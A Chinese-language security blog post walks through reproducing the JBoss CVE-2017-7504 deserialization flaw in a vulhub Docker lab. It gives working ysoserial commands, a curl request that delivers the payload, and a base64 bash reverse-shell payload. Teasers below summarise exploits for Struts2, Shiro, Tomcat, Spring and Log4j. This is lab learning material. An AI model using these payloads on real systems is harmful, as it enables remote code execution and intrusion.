JBoss 反序列化漏洞 CVE-2017-7504

发表于2026-02-12|更新于2026-03-15|漏洞

|总字数:394|阅读时长:1分钟

影响范围

JBoss AS 3.2.0 - 4.2.3.GA

漏洞类型

Java 反序列化

操作系统限制

无

配置要求

默认配置

漏洞利用

命令执行，反弹 shell

利用原理

JBoss AS 默认集成了一个用于 HTTP 协议传输信息的组件 JBossMQ，其组件含有一个名为 HTTPServerILServlet 的接口，该接口访问路径/jbossmq-httpil/HTTPServerILServlet 无需校验即可访问，Servlet 处理 POST 请求数据时，直接调用 readObject () 方法来反序列化数据流，且未对传入对象进行安全过滤或白名单限制，攻击者利用 yoserial 工具生成恶意系列化二进制数据，通过 HTTP 请求发送到靶机，JBoss 解析对象时自动触发对象内部嵌套的恶意代码

漏洞复现

现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/jboss/CVE-2017-7504
#拉取镜像
docker-compose up -d

1773506967678

下载攻击工具并检查是否有 Java 环境

1
2
3

wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial.jar
#检查Java环境
java -version

1773507049029

使用 ysoserial 生成序列化数据

1	java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" > payload.ser

1773507085818

用 curl 发送 payload

1	curl http://靶机ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @payload.ser

1773507115114

进入容器查看 tmp 文件夹，发现 success，说明成功复现漏洞

1773507138029

下面进行反弹 shell，开启 nc 监听

1773507180906

把执行命令换成反弹 shell

1	java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,反弹shell的base64编码}\|{base64,-d}\|{bash,-i}" > payload.ser

1773507207767

发送攻击 payload

1773507261832

成功连接

1773507291544

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/12/CVE-2017-7504/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

JBoss 反序列化漏洞 CVE-2017-12149

影响范围 JBoss AS 5.x - JBoss AS 6.1.0.Final 漏洞类型Java 反序列化操作系统限制无配置要求 http-invoker.sar 必须处于部署状态 ReadOnlyAccessFilter 过滤器映射漏洞利用命令执行，反弹 shell 利用原理在 JBoss AS 5.x 或 6.x 中，引入名为 ReadOnlyAccessFilter 过滤器，其默认映射路径为/invoker/readonly，该路径在默认配置下无需身份验证就可访问，该过滤器处理客户端发送的 POST 请求数据时，直接获取请求体的输入流调用 readObject () 方法进行反序列化操作。在还原对象过程中，系统未对传入二进制流进行安全过滤、字节码校验或白名单限制，攻击者可以构造恶意序列化对象，恶意二进制数据通过 HTTP 请求发送到靶机，JBoss 在解析对象时，自动触发对象内部嵌套的恶意代码，执行恶意命令漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vul...

Struts2 远程代码执行漏洞 CVE-2017-9805

影响范围 Struts 2.1.2 - 2.3.33 Struts 2.5 - 2.5.12 漏洞类型XML 反序列化操作系统限制无配置要求默认配置漏洞利用写入敏感文件，反弹 shell 获取服务器权限利用原理Struts2 框架对外部组件 XStream 插件默认使用 XStream 处理 XML 格式数据，可以将几乎任何 XML 标签映射为 Java 对象，攻击者在 Java 运行库寻找可以执行系统命令的类，由于 XStream 没有限制，攻击者可以构造特殊的 XML，包含触发点、执行链、敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-052#拉取镜像docker-compose up -d 访问 http://公网: 8080/orders 用 burpsuite 抓取 http://公网: 8080/orders/3/edit 数据包发送到 Repeater 模...

Shiro 认证绕过漏洞 CVE-2020-1957

影响范围 Apache Shiro 1.0.0-incubating - 1.5.1 漏洞类型权限绕过操作系统限制无配置要求 Shiro 拦截器采用了路径匹配模式漏洞利用登录管理后台，信息泄露利用原理在 Shiro 的 1.5.2 之前的版本中，WebUtils.getPathWithinApplication() 方法处理 URL 时候会根据分号对路径进行截断，会认为分号后面不属于路径一部分；而 Spring 框架在匹配控制器路由时候，会对 URL 进行标准化处理（例如解析穿越符..），它对分号处理方式不同。二者对请求的解析不一样，攻击者通过特殊构造/;/路径来绕过 Shiro 的过滤漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/shiro/CVE-2020-1957#拉取镜像docker-compose up -d 抓取 http://靶机 ip:8080/admin 数据包发送到 Repeater...

Tomcat 任意文件写入漏洞 CVE-2017-12615

影响范围： Apache Tomcat 7.0.0 - 7.0.79 漏洞类型：任意文件写入漏洞操作系统限制：Windows 配置要求：需开启 readonly = false 漏洞利用：写入敏感文件，例如用木马 getshell 利用原理：Windows 特性，在文件名后面加空格、/、::$DATA，系统会自动忽略后缀绕过手段：斜杠绕过：PUT /文件名.jsp/ 空字符绕过：PUT /文件名.jsp%20（空格） NTFS 流绕过：PUT /文件名.jsp::$DATA 漏洞复现：12345678# 拉取dockers镜像，将端口映射到8081，访问公网地址:8081docker run -d -p 8081:8080 --name tomcat-7070 tomcat:7.0.70# 镜像默认没开readonly=false，用sed强行改写docker exec -it tomcat-7070 sed -i '/<servlet-class>org.apache.catalina.servlets.DefaultServlet<\/ser...

Spring Data Commons 远程命令执行 CVE-2018-1273

影响范围 Spring Data Commons 1.13 - 1.13.10 Spring Data Commons 2.0 - 2.0.5 Spring Boot 1.5.0 - 1.5.11 Spring Boot 2.0.0 - 2.0.1 漏洞类型SpEL 表达式注入操作系统限制无配置要求默认配置漏洞利用命令执行，进行反弹 shell，写入木马利用原理Spring MVC 中，当用户通过 POST 表单提交数据，Spring Data 会尝试将请求参数绑定到后端 Java 对象或 Map 中，Spring Data 允许参数名通过方括号语法定位集合或 Map 中的元素（例如 tags [0] 或 users [‘admin’]），当 Spring Data 处理方括号 2 的参数名时候，会调用 MapDataBinder 进行解析，而系统直接调用 SpEL 引擎来解析方括号内容且不做过滤，攻击者可以通过参数名的方括号注入恶意 SpEL 代码实现命令执行漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone http...

Log4j 反序列化命令执行漏洞 CVE-2017-5645

影响范围 Apache Log4j 2.0-alpha1 - 2.8.1 漏洞类型Java 反序列化操作系统限制无配置要求启动 Log4j 的 TcpSocketServer 服务，监听 4712 端口（也可指定其他端口）漏洞利用命令执行，反弹 shell，植入木马利用原理Log4j 的 TcpSocketServer 和 UdpSocketServer 类中，在接收日志数据时，没有对数据进行安全检验，直接通过 ObjectInputSteam.readObject() 进行反序列化，攻击者可以构造被序列化的恶意对象链来实现命令执行漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/log4j/CVE-2017-5645#拉取镜像docker-compose up -d 扫描靶机端口 4712，用 telnet 连接成功连接，说明端口开放 12telnet 公网ip 被扫描端口nc -zv 公网ip 被扫描端...

评论

数据加载中